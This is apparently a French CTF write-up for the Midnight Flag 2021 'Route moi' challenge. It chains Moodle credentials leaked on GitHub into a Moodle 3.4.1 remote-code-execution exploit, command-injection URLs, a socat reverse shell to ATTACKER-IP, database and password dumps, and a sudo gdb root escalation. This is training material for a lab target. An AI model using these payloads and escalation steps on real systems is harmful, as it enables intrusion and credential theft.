Midnight Flag CTF 2021 — Réaliste — Route moi — Write-up

Flag To The Future — Midnight Flag
Tableau des scores

Route-moi — Mel

Page d’acceuil de Moodle
Page de login de Moodle
Cours accessible sans compte sur Moodle
Dépôt github public
Commits du dépôt github
Commit intéressant sur le dépôt github
  • La version de Moodle 3.4.1
  • Les identifiants de connexion de Mel sur Moodle
  • Le type de base de données MySQL
  • Les identifiants de connexion à la base de données
// Moodle
$CFG->version = ‘3.4.1’;
$CFG->username = ‘meltheboss’;
$CFG->password = ‘R0uteM01!#’;
// DB
$CFG->dbtype: ‘mysqli’;
$CFG->dbuser: ‘kira’;
$CFG->dbpass: ‘eeICBkn2kiyWZMayas6o3’;
* — — — — — — — — — — — — — — — *
* Noodle [Moodle RCE] (v3.4.1) *
* — — — — — — — — — — — — — — — *
[!] Make sure you have a listener
[!] at ATTACKER-IP:4444
[*] Logging in as user meltheboss with password R0uteM01!#
[+] Successful Login
[>] Moodle Session pckrulmghhig58ujs4ts088jm2
[>] Moodle Key afoF4SfhmS
[*] Loading Course ID 2
[+] Successfully Loaded Course
[*] Enable Editing
[+] Successfully Enabled Course Editing
[*] Adding Quiz
[+] Successfully Added Quiz
[*] Configuring New Quiz
[+] Successfully Configured Quiz
[*] Loading Edit Quiz Page
[+] Successfully Loaded Edit Quiz Page
[*] Adding Calculated Question
[+] Successfully Added Calculation Question
[*] Adding Evil Question
[-] EVIL QUESTION CREATION FAILED!
Ajout d’une question au quizz
Ajout du payload dans la variable de substitution de la question
http://217.160.15.230:39910/question/question.php?returnurl=%2Fmod%2Fquiz%2Fedit.php%3Fcmid%3D2%26addonpage%3D0&appendqnumstring=addquestion&scrollpos=0&id=1&wizardnow=datasetitems&cmid=2&0=ls%20-al%20./%20%3E%20../test.txt
ls -al ./ > ../test.txt
http://217.160.15.230:39910/test.txt
Retour de la commande exécutée dans le webshell depuis Moodle
wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:’bash -li’,pty,stderr,setsid,sigint,sane tcp:ATTACKER-IP:4444
http://217.160.15.230:39910/question/question.php?returnurl=%2Fmod%2Fquiz%2Fedit.php%3Fcmid%3D2%26addonpage%3D0&appendqnumstring=addquestion&scrollpos=0&id=1&wizardnow=datasetitems&cmid=2&0=wget%20-q%20https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat%20-O%20/tmp/socat;%20chmod%20777%20/tmp/socat;%20/tmp/socat%20exec:%27bash%20-li%27,pty,stderr,setsid,sigint,sane%20tcp:ATTACKER-IP:4444
nc -lvp 4444
Connection from 217.160.15.230:56218
www-data@9bc902ace084:/var/www/html/question$ whoami
whoami
www-data
www-data@9bc902ace084:/var/www/html/question$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
meltheboss:x:1000:1000::/home/meltheboss:/bin/sh
ftp:x:101:103:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
mysql:x:102:104:MySQL Server,,,:/nonexistent:/bin/false
systemd-network:x:103:106:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:104:107:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
messagebus:x:105:109::/nonexistent:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
www-data@9bc902ace084:/var/www/html/question$ mysql -u kira --password="eeICBkn2kiyWZMyas6o3"
$ mysql -u kira --password="eeICBkn2kiyWZMyas6o3"
mysql: [Warning] Using a password on the command line interface can be insecure.
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 228
Server version: 5.7.33-0ubuntu0.18.04.1 (Ubuntu)
Copyright (c) 2000, 2021, Oracle and/or its affiliates.Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| moodle |
| mysql |
| performance_schema |
| sys |
| wordpress |
+--------------------+
6 rows in set (0.00 sec)
mysql> use wordpress;
use wordpress;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> select * from wp_users;
select * from wp_users;
+----+------------+------------------------+---------------+----------------+----------+---------------------+---------------------+-------------+--------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+------------+------------------------+---------------+----------------+----------+---------------------+---------------------+-------------+--------------+
| 1 | meltheboss | UDRzc3cwcmQwZm0zbCEhCg | mel | mel@theboss.fr | | 2021-03-09 18:35:44 | | 0 | MelTheBoss |
+----+------------+------------------------+---------------+----------------+----------+---------------------+---------------------+-------------+--------------+
1 row in set (0.00 sec)
mysql> exit
exit
Bye
www-data@9bc902ace084:/var/www/html/question$ print "UDRzc3cwcmQwZm0zbCEhCg==" | base64 -dP4ssw0rd0fm3l!!
ssh meltheboss@217.160.15.230 -p 55183Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 5.4.0-66-generic x86_64)* Documentation:  https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
Last login: Sun Apr 11 21:32:28 2021 from 87.231.53.88
$ whoami
meltheboss
$ cat flag.txt
MCTF{m00dl3_w4s_4_r34lly_b4d_1d34}

Route-moi — Root

  • sudo -l en tant que meltheboss afin d’obtenir la liste des potentiels exécutables en tant que root.
$ sudo -l
Matching Defaults entries for meltheboss on 9bc902ace084:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User meltheboss may run the following commands on 9bc902ace084:
(ALL) NOPASSWD: /usr/local/bin/gdb_fork.py
sudo /usr/local/bin/gdb_fork.py
Absolute path of the file to execute: /tmp/test.py
/tmp/test.py
The content of the file does not seem to look like valid instructions executable by gdb or the PID is invalid or you try to attach to a forbidden process.
Example valid file:
import gdb
gdb.execute('attach x')
gdb.execute('i r a')
gdb.execute('quit')
import gdb
gdb.execute('attach x')
gdb.execute('i r a')
gdb.execute('quit')
sudo install -m =xs $(which gdb) ../gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit
import gdbgdb.execute('python print(open("/root/flag.txt").read())')
$ sudo /usr/local/bin/gdb_fork.py test.py
Absolute path of the file to execute: /tmp/test.py
MCTF{w00t_m3lth3b0ss_u_s4v3_r00t_m3_!!}
(gdb) quit
$

--

--

French CTF team

Love podcasts or audiobooks? Learn on the go with our new app.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store